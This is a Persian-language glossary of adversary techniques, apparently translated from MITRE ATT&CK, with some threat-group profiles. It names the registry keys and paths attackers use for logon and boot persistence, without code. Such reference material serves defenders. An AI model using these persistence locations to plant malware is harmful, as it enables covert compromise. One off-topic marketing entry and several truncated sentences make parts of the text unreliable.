دشمنان ممکن است از SID-History Injection برای افزایش امتیازات و دور زدن کنترل های دسترسی استفاده کنند. شناسه امنیتی ویندوز (SID) یک مقدار منحصر به فرد است که یک حساب کاربری یا گروه را شناسایی می کند. SIDها توسط امنیت ویندوز هم در توصیفگرهای امنیتی و هم در توکن های دسترسی استفاده می شوند. یک حساب می‌تواند SID‌های اضافی را در ویژگی SID-History Active Directory attribute نگه دارد، که امکان مهاجرت حساب‌های قابل‌عملکرد بین دامنه‌ها را فراهم می‌کند (به عنوان مثال، همه مقادیر در SID-History در نشانه‌های دسترسی گنجانده شده‌اند). با حقوق سرپرست دامنه (یا معادل آن)، مقادیر SID استخراج شده یا شناخته شده ممکن است در SID-History درج شود تا جعل هویت کاربران/گروه های دلخواه مانند مدیران سازمانی امکان پذیر شود. این دستکاری ممکن است منجر به افزایش دسترسی به منابع محلی و/یا دسترسی به دامنه‌های غیرقابل دسترس از طریق تکنیک‌های حرکت جانبی مانند سرویس‌های راه دور، اشتراک‌های مدیریت SMB/Windows یا مدیریت از راه دور ویندوز شود.

حریف در وسط

Adversary-in-the-Middle

دشمنان ممکن است با استفاده از تکنیک خصمانه در وسط (AiTM) برای پشتیبانی از رفتارهای بعدی مانند Sniffing شبکه یا دستکاری داده های انتقال یافته، سعی کنند خود را بین دو یا چند دستگاه شبکه قرار دهند. با سوء استفاده از ویژگی‌های پروتکل‌های شبکه رایج که می‌توانند جریان ترافیک شبکه را تعیین کنند (مانند ARP، DNS، LLMNR، و غیره)، دشمنان ممکن است دستگاه را مجبور به برقراری ارتباط از طریق یک سیستم کنترل‌شده توسط دشمن کنند تا بتوانند اطلاعات را جمع‌آوری کنند یا اقدامات اضافی را انجام دهند.دشمنان ممکن است از موقعیت AiTM برای تغییر ترافیک استفاده کنند، مانند دستکاری داده های انتقال یافته. دشمنان همچنین می توانند از جریان ترافیک به مقصد مناسب جلوگیری کنند و باعث انکار سرویس شوند.

کشف حساب

Account Discovery

دشمنان ممکن است تلاش کنند تا فهرستی از حساب ها را در یک سیستم یا در یک محیط دریافت کنند. این اطلاعات می تواند به دشمنان کمک کند تا تعیین کنند کدام حساب ها برای کمک به رفتارهای بعدی وجود دارند.

کشف پنجره برنامه

Application Window Discovery

ممکن است دشمنان سعی کنند فهرستی از پنجره های برنامه باز را دریافت کنند. فهرست‌های پنجره‌ای می‌توانند اطلاعاتی را در مورد نحوه استفاده از سیستم منتقل کنند یا به اطلاعات جمع‌آوری‌شده توسط یک کی‌لاگر زمینه بدهند

آرشیو داده های جمع آوری شده

Archive Collected Data

دشمن ممکن است داده‌هایی را که قبل از استخراج جمع‌آوری شده است فشرده و یا رمزگذاری کند. فشرده سازی داده ها می تواند به مبهم سازی داده های جمع آوری شده و به حداقل رساندن مقدار داده‌های ارسال شده از طریق شبکه کمک کند. از رمزگذاری می‌توان برای پنهان کردن اطلاعاتی استفاده کرد که از شناسایی خارج می‌شوند یا پس از بازرسی توسط مدافع، نفوذ را کمتر نمایان می‌کند.هم فشرده سازی و هم رمزگذاری قبل از خروج انجام می شود و می توان با استفاده از ابزار، کتابخانه شخص ثالث یا روش سفارشی انجام داد.

ضبط صدا

Audio Capture

یک دشمن می‌تواند از دستگاه‌های جانبی رایانه (مانند میکروفون و وب‌کم) یا برنامه‌های کاربردی (مانند خدمات تماس صوتی و تصویری) برای ضبط صداهای ضبط‌شده به منظور گوش دادن به مکالمات حساس برای جمع‌آوری اطلاعات استفاده کند. بدافزارها یا اسکریپت‌ها ممکن است برای تعامل با دستگاه‌ها از طریق یک API موجود ارائه شده توسط سیستم عامل یا برنامه‌ای برای ضبط صدا استفاده شوند. فایل‌های صوتی ممکن است روی دیسک نوشته شده و بعداً استخراج شوند.

مجموعه خودکار

Automated Collection

پس از ایجاد در یک سیستم یا شبکه، یک دشمن ممکن است از تکنیک های خودکار برای جمع آوری داده های داخلی استفاده کند. روش‌های اجرای این تکنیک می‌تواند شامل استفاده از یک مترجم فرمان و اسکریپت برای جستجو و کپی اطلاعات متناسب با معیارهای مجموعه‌ای مانند نوع فایل، مکان یا نام در فواصل زمانی خاص باشد. این قابلیت همچنین می تواند در ابزارهای دسترسی از راه دور تعبیه شود. این تکنیک ممکن است شامل استفاده از تکنیک‌های دیگری مانند کشف فایل و فهرست و انتقال ابزار جانبی برای شناسایی و جابجایی فایل‌ها باشد.

پروتکل لایه کاربردی

Application Layer Protocol

دشمنان ممکن است با استفاده از پروتکل های لایه برنامه ارتباط برقرار کنند تا از شناسایی/فیلتر شبکه با ترکیب شدن با ترافیک موجود جلوگیری کنند. دستورات به سیستم راه دور، و اغلب نتایج آن دستورات، در ترافیک پروتکل بین مشتری و سرور تعبیه می شود. دشمنان ممکن است از پروتکل‌های مختلفی استفاده کنند، از جمله پروتکل‌هایی که برای مرور وب، انتقال فایل‌ها، نامه الکترونیکی یا DNS استفاده می‌شوند. برای اتصالاتی که به صورت داخلی در یک محصور (مانند اتصالات بین یک پروکسی یا گره محوری و سایر گره ها) اتفاق می افتد، پروتکل های رایج مورد استفاده SMB، SSH یا RDP هستند.

استخراج خودکار

Automated Exfiltration

دشمنان ممکن است از طریق استفاده از پردازش خودکار پس از جمع‌آوری در طول جمع‌آوری، داده‌هایی مانند اسناد حساس را استخراج کنند.هنگامی که از اکسفیلتراسیون خودکار استفاده می شود، سایر تکنیک های اکسفیلتراسیون احتمالاً برای انتقال اطلاعات به خارج از شبکه نیز کاربرد دارند. مانند: and .

حذف دسترسی به حساب

Account Access Removal

دشمنان ممکن است با ممانعت از دسترسی به حساب های استفاده شده توسط کاربران قانونی، دسترسی به منابع سیستم و شبکه را قطع کنند. حساب‌ها ممکن است حذف، قفل یا دستکاری شوند (مثلاً: تغییر اعتبار) برای حذف دسترسی به حساب‌ها. همچنین ممکن است متعاقباً دشمنان از سیستم خارج شوند و/یا جعبه‌ها را مجدداً راه‌اندازی کنند تا تغییرات مخرب را در جای خود تنظیم کنند.

یک گروه تهدید سایبری

Admin@338

یک گروه تهدید سایبری مستقر در چین است. قبلاً از رویدادهای خبری به عنوان فریب برای ارائه بدافزار استفاده کرده است و در درجه اول سازمان‌های درگیر در سیاست‌های مالی، اقتصادی و تجاری را هدف قرار داده است، معمولاً از RATهای در دسترس عمومی مانند PoisonIvy و همچنین برخی از درهای پشتی غیر عمومی استفاده می‌کنند.

تیم امنیتی آژاکس

Ajax Security Team

تیم امنیتی آژاکس گروهی است که حداقل از سال 2010 فعال بوده و گمان می رود در خارج از ایران فعالیت می کند. تا سال 2014، تیم امنیتی آژاکس از عملیات تخریب وب سایت به کمپین های جاسوسی سایبری مبتنی بر بدافزار که پایگاه صنعتی دفاعی ایالات متحده و کاربران ایرانی فناوری های ضد سانسور را هدف قرار می دهد، انتقال یافت.

اندریل

Andariel

اندریل یک گروه تهدید کننده تحت حمایت دولت کره شمالی است که حداقل از سال 2009 فعال بوده است. آنها همچنین عملیات مالی سایبری را علیه دستگاه‌های خودپرداز، بانک‌ها و صرافی‌های ارزهای دیجیتال انجام داده‌اند. فعالیت های قابل توجه Andariel شامل عملیات Black Mine، Operation GoldenAxe و Campaign Rifle است.اندریل زیرمجموعه ای از گروه لازاروس محسوب می شود و به دفتر عمومی شناسایی کره شمالی نسبت داده می شود. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

یک گروه جاسوسی سایبری است

Axiom

Axiom یک گروه جاسوسی سایبری است که مظنون به ارتباط با دولت چین است. مسئول کمپین عملیات SMN است. اگرچه هم این گروه و هم گروه Winnti از بدافزار Winnti برای ویندوز استفاده می‌کنند، به نظر می‌رسد این دو گروه بر اساس تفاوت در گزارش‌گیری در مورد TTP و هدف‌گیری گروه‌ها از هم متمایز هستند.

حمله دور زدن

Bypass Attack

حمله دور زدن غیر مستقیم‌ترین استراتژی بازاریابی است که توسط شرکت چالش برانگیز با هدف پیشی گرفتن از رقیب با حمله به بازارهای آسان‌تر آن اتخاذ شده است. هدف از این استراتژی افزایش منابع شرکت یا تصاحب سهم بازار شرکت رقیب است.

بوت یا ورود به سیستم شروع خودکار اجرا

Boot or Logon Autostart Execution

دشمنان ممکن است تنظیمات سیستم را برای اجرای خودکار یک برنامه در حین بوت شدن یا ورود به سیستم پیکربندی کنند تا پایداری خود را حفظ کنند یا امتیازات سطح بالاتر را در سیستم های در معرض خطر به دست آورند. سیستم‌های عامل ممکن است مکانیسم‌هایی برای اجرای خودکار یک برنامه در هنگام راه‌اندازی سیستم یا ورود به حساب داشته باشند. این مکانیسم‌ها ممکن است شامل برنامه‌هایی باشد که به طور خودکار اجرا می‌شوند که در دایرکتوری‌های مشخص شده قرار می‌گیرند یا توسط مخازنی که اطلاعات پیکربندی را ذخیره می‌کنند، مانند رجیستری ویندوز، ارجاع داده می‌شوند. یک دشمن ممکن است با اصلاح یا گسترش ویژگی‌های هسته به همان هدف دست یابد. از آنجایی که برخی از برنامه‌های راه‌اندازی خودکار یا ورود به سیستم با امتیازات بالاتر اجرا می‌شوند، دشمن ممکن است از آنها برای افزایش امتیازات استفاده کند.

بوت یا ورود به سیستم اجرای خودکار: کلیدهای اجرای رجیستری / پوشه راه اندازی

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

دشمنان ممکن است با افزودن یک برنامه به پوشه راه‌اندازی یا ارجاع دادن به آن با یک کلید اجرای رجیستری به پایداری دست یابند. افزودن یک ورودی به "کلیدهای اجرا" در رجیستری یا پوشه راه‌اندازی باعث می‌شود برنامه ارجاع‌شده در هنگام ورود کاربر اجرا شود. این برنامه‌ها تحت شرایط کاربر اجرا می‌شوند و مجوزهای مربوط به حساب را خواهند داشت. مرحله. قرار دادن یک برنامه در یک پوشه راه‌اندازی همچنین باعث می‌شود که وقتی کاربر وارد می‌شود، آن برنامه اجرا شود. یک مکان پوشه راه‌اندازی برای حساب‌های کاربری فردی و همچنین یک پوشه راه‌اندازی در سراسر سیستم وجود دارد که بدون در نظر گرفتن اینکه کدام حساب کاربری وارد شده است بررسی می‌شود.

بوت یا ورود به سیستم شروع خودکار اجرا: بسته احراز هویت

Boot or Logon Autostart Execution: Authentication Package

هنگامی که سیستم بوت می شود، دشمنان ممکن است از بسته های احراز هویت برای اجرای DLL سوء استفاده کنند. DLL های بسته احراز هویت ویندوز توسط فرآیند محلی امنیت (LSA) در شروع سیستم بارگیری می‌شوند. آنها از چندین فرآیند ورود به سیستم و چندین پروتکل امنیتی برای سیستم عامل پشتیبانی می کنند. دشمنان می توانند با قرار دادن ارجاع به یک باینری در مکان رجیستری ویندوز HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ با مقدار کلیدی "Authentication Packages"=<target binary>از مکانیسم شروع خودکار ارائه شده توسط بسته های احراز هویت LSA برای تداوم استفاده کنند. پس از بارگیری بسته های احراز هویت، باینری توسط سیستم اجرا می شود.

بوت یا ورود به سیستم شروع خودکار اجرا: ارائه دهندگان زمان

Boot or Logon Autostart Execution: Time Providers

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان زمان برای اجرای DLL سوء استفاده کنند. سرویس (W32Time) همگام سازی زمان را در دامنه ها و درون دامنه ها فعال می کند. ارائه دهندگان زمان W32Time مسئول بازیابی مهرهای زمانی از منابع سخت افزاری/ شبکه و خروجی این مقادیر به سایر مشتریان شبکه هستند. ارائه‌دهندگان زمان به‌عنوان کتابخانه‌های پیوند پویا (DLL)پیاده‌سازی می‌شوند که در کلیدهای فرعی زیر ثبت شده‌اند. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ مدیر ارائه‌دهنده زمان، که توسط مدیر کنترل سرویس هدایت می‌شود، ارائه‌دهندگان زمان فهرست‌شده و فعال در زیر این کلید را هنگام راه‌اندازی سیستم و/یا هر زمان که پارامترها تغییر می‌کنند، بارگیری و راه‌اندازی می‌کند. دشمنان ممکن است از این معماری برای ایجاد تداوم سوء استفاده کنند، به ویژه با ثبت و فعال کردن یک DLL مخرب به عنوان ارائه‌دهنده زمان. امتیازات سرپرست برای ثبت نام ارائه‌دهنده زمانی مورد نیاز است، اگرچه اجرا در زمینه حساب Local Service اجرا می‌شود.

بوت یا ورود به سیستم اجرا خودکار: Winlogon Helper DLL

Boot or Logon Autostart Execution: Winlogon Helper DLL

هنگامی که کاربر وارد سیستم می‌شود، ممکن است دشمنان از ویژگی‌های Winlogon برای اجرای DLL و یا فایل‌های اجرایی سوء استفاده کنند. Winlogon.exe یک مؤلفه ویندوز است که مسئول اقدامات در هنگام ورود/خروج و همچنین توالی توجه ایمن (SAS) است که توسط Ctrl-Alt-Delete فعال می‌شود. ورودی‌های رجیستری در HKLM\Software[\Wow6432Node\]\Microsoft\WindowsNT\CurrentVersion\Winlogon\ و HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ برای مدیریت برنامه‌های کمکی اضافی و عملکردهای Winlogon استفاده می‌شوند. تغییرات مخرب در این کلیدهای رجیستری ممکن است باعث شود Winlogon DLL ها و یا فایل های اجرایی مخرب را بارگیری و اجرا کند. به طور خاص، کلیدهای فرعی زیر احتمالاً در معرض سوء استفاده هستند: Winlogon\Notify - به DLL های بسته اعلان اشاره می کند که رویدادهای Winlogon را مدیریت می کنند. Winlogon\Userinit - به userinit.exe اشاره می کند، برنامه مقداردهی اولیه کاربر که هنگام ورود کاربر اجرا می شود. Winlogon\Shell - به explorer.exe اشاره می کند، پوسته سیستمی که هنگام ورود کاربر اجرا می شود. دشمنان ممکن است از این ویژگی ها برای اجرای مکرر کدهای مخرب و ایجاد پایداری استفاده کنند.

بوت یا ورود به سیستم شروع خودکار اجرا: ارائه دهنده پشتیبانی امنیتی

Boot or Logon Autostart Execution: Security Support Provider

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان پشتیبانی امنیتی ( SSP) برای اجرای DLL سوء استفاده کنند. DLL های Windows SSP در هنگام شروع سیستم در فرآیند Local Security Authority (LSA) بارگذاری می شوند. پس از بارگیری در LSA، DLL های SSP به رمزهای عبور رمزگذاری شده و متن ساده که در ویندوز ذخیره می شوند، مانند رمز عبور دامنه یا پین کارت هوشمند هر کاربر وارد شده دسترسی دارند. پیکربندی SSP در دو کلید رجیستری ذخیره می شود: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages و HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages حریف ممکن است این کلیدهای رجیستری را تغییر دهد تا SSPهای جدید اضافه کند، که دفعه بعد که سیستم بوت می شود، یا زمانی که تابع AddSecurityPackage Windows API فراخوانی می شود، بارگذاری می‌شوند.

اجرای خودکار راه‌اندازی یا ورود به سیستم: ماژول‌ها و برنامه‌های افزودنی هسته

Boot or Logon Autostart Execution: Kernel Modules and Extensions

دشمنان ممکن است کرنل را تغییر دهند تا به طور خودکار برنامه ها را در بوت سیستم اجرا کند. ماژول‌های کرنل قابل بارگیری ( LKM) قطعه‌هایی از کد هستند که می‌توانند در صورت تقاضا در هسته بارگیری و تخلیه شوند. آنها عملکرد هسته را بدون نیاز به راه اندازی مجدد سیستم گسترش می دهند. به عنوان مثال، یک نوع ماژول، درایور دستگاه است که به هسته اجازه می دهد تا به سخت افزار متصل به سیستم دسترسی پیدا کند. هنگامی که به طور مخرب استفاده می شود، LKM ها می توانند یک نوع Rootkit در حالت هسته باشند که با بالاترین امتیاز سیستم عامل (Ring 0 ) اجرا می شوند. ویژگی‌های رایج روت‌کیت‌های مبتنی بر LKM عبارتند از: پنهان کردن خود، مخفی کردن انتخابی فایل‌ها، فرآیندها و فعالیت‌های شبکه، و همچنین دستکاری گزارش‌ها، ارائه درب‌های پشتی تأیید شده و امکان دسترسی روت به کاربران غیرمجاز. پسوندهای هسته، که kext نیز نامیده می‌شوند، برای macOS استفاده می‌شوند تا عملکردها را روی سیستمی مشابه LKMs برای لینوکس بارگذاری کنند. آنها از طریق دستورات kextload و kextunload بارگیری و تخلیه می شوند.

راه‌اندازی یا ورود به سیستم اجرای خودکار: برنامه‌ها دوباره باز می‌شوند

Boot or Logon Autostart Execution: Re-opened Applications

دشمنان ممکن است فایل‌های plist را تغییر دهند تا زمانی که کاربر وارد سیستم می‌شود، برنامه را به‌طور خودکار اجرا کند. با شروع Mac OS X 10.7 (Lion) کاربران می‌توانند برنامه‌های خاصی را مشخص کنند که وقتی کاربر پس از راه‌اندازی مجدد به دستگاه خود وارد می‌شود، دوباره باز شوند. در حالی که این کار معمولاً از طریق یک رابط کاربری گرافیکی ( GUI) بر اساس برنامه به برنامه انجام می‌شود، فایل‌های فهرست دارایی ( plist)وجود دارند که حاوی این اطلاعات هستند و همچنین در ~/Library/Preferences/com.apple.loginwindow.plist و ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. قرار دارند. حریف می‌تواند یکی از این فایل‌ها را مستقیماً تغییر دهد تا پیوندی به فایل اجرایی مخرب خود اضافه کند تا هر بار که کاربر دستگاه خود را راه‌اندازی مجدد می‌کند، مکانیزم پایداری ارائه کند.

بوت یا ورود به سیستم شروع خودکار اجرا: درایور LSASS

Boot or Logon Autostart Execution: LSASS Driver

دشمنان ممکن است درایورهای LSASSرا تغییر داده یا اضافه کنند تا پایداری در سیستم های در معرض خطر را به دست آورند. زیرسیستم امنیتی ویندوز مجموعه ای از مؤلفه ها است که خط مشی امنیتی یک رایانه یا دامنه را مدیریت و اجرا می کند. سازمان امنیت محلی (LSA)مؤلفه اصلی مسئول سیاست امنیتی محلی و تأیید اعتبار کاربر است. LSA شامل چندین کتابخانه پیوند پویا (DLL) مرتبط با توابع امنیتی مختلف است که همه آنها در چارچوب خدمات زیرسیستم LSA (LSASS) lsass.exe اجرا می شوند. دشمنان ممکن است درایورهای LSASS را برای به دست آوردن پایداری هدف قرار دهند. با جایگزین کردن یا اضافه کردن درایورهای نامشروع به عنوان مثال، ( Hijack Execution Flow) ، یک دشمن می تواند از عملیات LSA برای اجرای مداوم بارهای مخرب استفاده کند.

بوت یا ورود به سیستم شروع خودکار اجرا: اصلاح میانبر

Boot or Logon Autostart Execution: Shortcut Modification

دشمنان ممکن است میانبرهایی را برای اجرای یک برنامه در هنگام بوت شدن سیستم یا ورود کاربر ایجاد یا ویرایش کنند. میانبرها یا پیوندهای نمادین راه هایی برای ارجاع به فایل ها یا برنامه های دیگر هستند که با کلیک یا اجرای میانبر توسط فرآیند راه اندازی سیستم، باز یا اجرا می شوند. دشمنان می توانند از میانبرها برای اجرای ابزارهای خود برای پایداری استفاده کنند. آنها ممکن است یک میانبر جدید به عنوان وسیله ای برای غیرمستقیم ایجاد کنند که ممکن است از Masquerading برای شبیه به یک برنامه قانونی استفاده کند. دشمنان همچنین می توانند مسیر هدف را ویرایش کنند یا به طور کامل یک میانبر موجود را جایگزین کنند تا ابزارهای آنها به جای برنامه قانونی مورد نظر اجرا شود.

بوت یا ورود به سیستم شروع خودکار اجرا: مانیتورهای پورت

Boot or Logon Autostart Execution: Port Monitors

دشمنان ممکن است از مانیتورهای پورت برای اجرای DLL ارائه شده توسط مهاجم در هنگام بوت شدن سیستم برای تداوم یا افزایش امتیاز استفاده کنند. یک مانیتور پورت را می توان از طریق فراخوانی AddMonitor API تنظیم کرد تا یک DLL را برای بارگذاری در هنگام راه اندازی تنظیم کند. این DLL را می توان در C:\Windows\System32 قرار داد و توسط سرویس spooler چاپ، spoolsv.exe، در بوت بارگیری می شود. فرآیند spoolsv.exe نیز تحت مجوزهای سطح SYSTEM اجرا می شود. همچنین، اگر مجوزها اجازه نوشتن یک نام مسیر کاملاً واجد شرایط برای آن DLL را در HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors بدهند، می‌توان یک DLL دلخواه بارگیری کرد. کلید رجیستری حاوی ورودی هایی برای موارد زیر است: پورت محلی پورت استاندارد TCP/IP مانیتور USB پورت WSD دشمنان می توانند از این تکنیک برای بارگذاری کدهای مخرب در هنگام راه اندازی استفاده کنند که در راه اندازی مجدد سیستم و اجرا به عنوان SYSTEM ادامه می یابد.

بوت یا ورود به سیستم شروع خودکار اجرا: اصلاح Plist

Boot or Logon Autostart Execution: Plist Modification

دشمنان می توانند فایل‌های لیست اموال (فایل‌های plist) را برای اجرای کد خود به عنوان بخشی از ایجاد پایداری تغییر دهند. فایل‌های Plist توسط برنامه‌های macOS برای ذخیره ویژگی‌ها و تنظیمات پیکربندی برنامه‌ها و سرویس‌ها استفاده می‌شوند. برنامه‌ها از فایل‌های plist اطلاعاتی، Info.plist، استفاده می‌کنند تا به سیستم عامل بگویید که چگونه برنامه را در زمان اجرا با استفاده از ابرداده ساختاریافته در قالب کلیدها و مقادیر مدیریت کند. فایل‌های Plist در XML و بر اساسCore Foundation DTD اپل فرمت‌بندی شده‌اند و می‌توانند در قالب متن یا باینری ذخیره شوند. دشمنان می‌توانند مسیرهای باینری‌های اجرا شده را تغییر دهند، آرگومان‌های خط فرمان اضافه کنند و مقادیر کلید/جفت را برای فهرست فایل‌ها در مکان‌های اجرای خودکار که پس از ورود کاربر یا راه‌اندازی سیستم اجرا می‌شوند، وارد کنند. از طریق اصلاح فایل‌های plist در این مکان‌ها، دشمنان همچنین می‌توانند یک کتابخانه پویا مخرب (dylib) را با افزودن یک فرهنگ لغت حاوی کلید DYLD_INSERT_LIBRARIES همراه با مسیری به dylib مخرب در زیر کلید EnvironmentVariables در یک فایل plist اجرا کنند. پس از ورود کاربر، plist برای اجرا فراخوانی می شود و dylib مخرب در فضای فرآیند اجرا می شود. پایداری را نیز می توان با تغییر کلید LSEnvironment در فایل Info.plist برنامه به دست آورد.

بوت یا ورود به سیستم شروع خودکار اجرا: پردازشگرهای چاپ

Boot or Logon Autostart Execution: Print Processors

دشمنان ممکن است از پردازنده های چاپ برای اجرای DLL های مخرب در هنگام بوت شدن سیستم برای تداوم و یا افزایش امتیاز سوءاستفاده کنند. پردازنده های چاپ DLL هایی هستند که توسط سرویس spooler چاپ، spoolsv.exe، در هنگام بوت بارگیری می شوند. دشمنان ممکن است با افزودن پردازنده های چاپی که DLL های مخرب را در هنگام راه اندازی بارگیری می کنند، از سرویس اسپولر چاپ سوء استفاده کنند. یک پردازشگر چاپ را می توان از طریق تماس AddPrintProcessor API با حسابی که SeLoadDriverPrivilege را فعال کرده است نصب کرد.

بوت یا ورود به سیستم شروع خودکار اجرا: ورودی‌های شروع خودکار XDG

Boot or Logon Autostart Execution: XDG Autostart Entries

دشمنان ممکن است ورودی های شروع خودکار XDG را برای اجرای برنامه ها یا دستورات در هنگام بوت سیستم تغییر دهند. محیط‌های دسک‌تاپ لینوکس که با XDG سازگار هستند، عملکردی را برای ورودی‌های شروع خودکار XDG اجرا می‌کنند. این ورودی‌ها به یک برنامه اجازه می‌دهد تا در هنگام راه‌اندازی یک محیط دسک‌تاپ پس از ورود کاربر به طور خودکار شروع به کار کند. به طور پیش‌فرض، ورودی‌های شروع خودکار XDG در دایرکتوری‌های /etc/xdg/autostart یا ~/.config/autostart ذخیره می‌شوند و دارای پسوند فایل دسکتاپ. در یک فایل ورودی XDG autostart، کلید Type مشخص می کند که آیا ورودی یک برنامه کاربردی (نوع 1)، پیوند (نوع 2) یا دایرکتوری (نوع 3) است. کلید Name یک نام دلخواه را نشان می‌دهد که توسط سازنده و کلید Exec برنامه و آرگومان‌های خط فرمان را برای اجرا نشان می‌دهد. دشمنان ممکن است از ورودی های XDG autostart برای حفظ پایداری با اجرای دستورات و بارهای مخرب، مانند ابزارهای دسترسی از راه دور، در طول راه اندازی یک محیط دسکتاپ استفاده کنند. دستورات موجود در ورودی‌های XDG autostart با اجرا پس از ورود کاربر در زمینه کاربر وارد شده در حال حاضر. دشمنان همچنین ممکن است از Masquerading استفاده کنند تا ورودی های شروع خودکار XDG طوری به نظر برسند که گویی با برنامه های قانونی مرتبط هستند.

بوت یا ورود به سیستم شروع خودکار اجرا: تنظیم فعال

Boot or Logon Autostart Execution: Active Setup

دشمنان ممکن است با افزودن یک کلید رجیستری به تنظیمات Active Setup ماشین محلی به پایداری دست یابند. Active Setup یک مکانیسم ویندوزی است که برای اجرای برنامه ها هنگام ورود کاربر استفاده می شود. مقدار ذخیره شده در کلید Registry پس از ورود کاربر به رایانه اجرا می شود. این برنامه ها تحت شرایط کاربر اجرا می شوند و سطح مجوزهای مرتبط با حساب را خواهند داشت. دشمنان ممکن است با ایجاد یک کلید در زیر HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ و تنظیم یک مقدار مخرب برای StubPath از Active Setup سوءاستفاده کنند. این مقدار به عنوان برنامه ای عمل می کند که زمانی که کاربر وارد رایانه می شود اجرا می شود. دشمنان می توانند از این مؤلفه ها برای اجرای بدافزارها، مانند ابزارهای دسترسی از راه دور، برای حفظ پایداری از طریق راه اندازی مجدد سیستم سوء استفاده کنند. همچنین ممکن است دشمنان از Masquerading استفاده کنند تا ورودی‌های رجیستری را طوری نشان دهند که گویی با برنامه‌های قانونی مرتبط هستند.

بوت یا ورود به سیستم شروع خودکار اجرا: موارد ورود به سیستم

Boot or Logon Autostart Execution: Login Items

دشمنان ممکن است موارد ورود به سیستم را برای اجرا در هنگام ورود کاربر اضافه کنند تا تداوم داشته باشند یا امتیازات را افزایش دهند. موارد ورود به سیستم برنامه‌ها، اسناد، پوشه‌ها یا اتصالات سرور هستند که با ورود کاربر به‌طور خودکار راه‌اندازی می‌شوند. موارد ورود به سیستم را می‌توان از طریق یک لیست فایل مشترک یا چارچوب مدیریت خدمات اضافه کرد. موارد ورود به لیست فایل‌های مشترک را می‌توان با استفاده از زبان‌های برنامه نویسی مانندAppleScriptتنظیم کرد، در حالی که چارچوب مدیریت خدمات از فراخوانی API SMLoginItemSetEnabled استفاده می کند. موارد ورود به سیستم نصب شده با استفاده از اهرم چارچوب مدیریت خدمات راه اندازی شده است، در تنظیمات برگزیده سیستم قابل مشاهده نیستند و فقط می توانند توسط برنامه ای که آنها را ایجاد کرده است حذف شوند. موارد ورود ایجاد شده با استفاده از یک لیست فایل مشترک در تنظیمات برگزیده سیستم قابل مشاهده هستند، می توانند برنامه را هنگام راه اندازی پنهان کنند، و از طریق LaunchServices اجرا می شوند، نه راه اندازی شده، برای باز کردن برنامه ها، اسناد، یا URL ها بدون استفاده از launchd کاربران و برنامه‌ها از آیتم‌های ورود به سیستم برای پیکربندی محیط کاربری خود برای راه‌اندازی سرویس‌ها یا برنامه‌های کاربردی رایج، مانند برنامه‌های ایمیل، چت و موسیقی استفاده می‌کنند.

اسکریپت های راه اندازی اولیه یا ورود به سیستم

Boot or Logon Initialization Scripts

دشمنان ممکن است از اسکریپت‌هایی استفاده کنند که به طور خودکار در هنگام راه‌اندازی اولیه یا ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. از اسکریپت های اولیه می توان برای انجام عملکردهای مدیریتی استفاده کرد، که اغلب ممکن است برنامه های دیگر را اجرا کند یا اطلاعات را به یک سرور ثبت داخلی ارسال کند. این اسکریپت ها می توانند بر اساس سیستم عامل و اینکه به صورت محلی یا از راه دور اعمال شوند، متفاوت باشند. دشمنان ممکن است از این اسکریپت ها برای حفظ پایداری در یک سیستم واحد استفاده کنند. بسته به پیکربندی دسترسی اسکریپت های ورود، ممکن است اعتبار محلی یا حساب مدیر لازم باشد. یک حریف همچنین ممکن است بتواند امتیازات خود را افزایش دهد زیرا برخی از اسکریپت های راه اندازی اولیه یا ورود به سیستم با امتیازات بالاتر اجرا می شوند.

اسکریپت های راه اندازی اولیه یا ورود به سیستم: اسکریپت ورود (ویندوز)

Boot or Logon Initialization Scripts: Logon Script (Windows)

دشمنان ممکن است از اسکریپت های ورود به سیستم ویندوز استفاده کنند که به طور خودکار در هنگام شروع ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. ویندوز اجازه می دهد تا هر زمان که یک کاربر خاص یا گروهی از کاربران وارد سیستم می شوند، اسکریپت های ورود به سیستم اجرا شوند. این کار از طریق افزودن یک مسیر به یک اسکریپت به کلید رجیستری HKCU\Environment\UserInitMprLogonScript انجام می‌شود. دشمنان ممکن است از این اسکریپت ها برای حفظ پایداری در یک سیستم واحد استفاده کنند. بسته به پیکربندی دسترسی اسکریپت های ورود، ممکن است اعتبار محلی یا حساب مدیر لازم باشد.

اسکریپت های راه اندازی اولیه یا ورود به سیستم: اسکریپت ورود به شبکه

Boot or Logon Initialization Scripts: Network Logon Script

دشمنان ممکن است از اسکریپت‌های ورود به شبکه استفاده کنند که به طور خودکار در هنگام شروع ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. اسکریپت‌های ورود به شبکه را می‌توان با استفاده ازActive Directory یا Group Policy Objects اختصاص داد. این اسکریپت های لاگین با امتیازات کاربری که به آنها اختصاص داده شده اجرا می شوند. بسته به سیستم های درون شبکه، مقداردهی اولیه یکی از این اسکریپت ها می تواند برای بیش از یک یا به طور بالقوه همه سیستم ها اعمال شود.

اسکریپت های راه اندازی اولیه یا ورود به سیستم: اسکریپت های RC

Boot or Logon Initialization Scripts: RC Scripts

